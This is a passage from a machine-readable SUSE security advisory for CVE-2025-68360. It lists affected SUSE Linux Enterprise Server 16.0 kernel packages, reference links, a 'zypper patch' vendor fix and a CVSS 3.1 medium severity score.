"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68360",
"url": "https://www.suse.com/security/cve/CVE-2025-68360"
},
{
"category": "external",
"summary": "SUSE Bug 1255536 for CVE-2025-68360",
"url": "https://bugzilla.suse.com/1255536"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
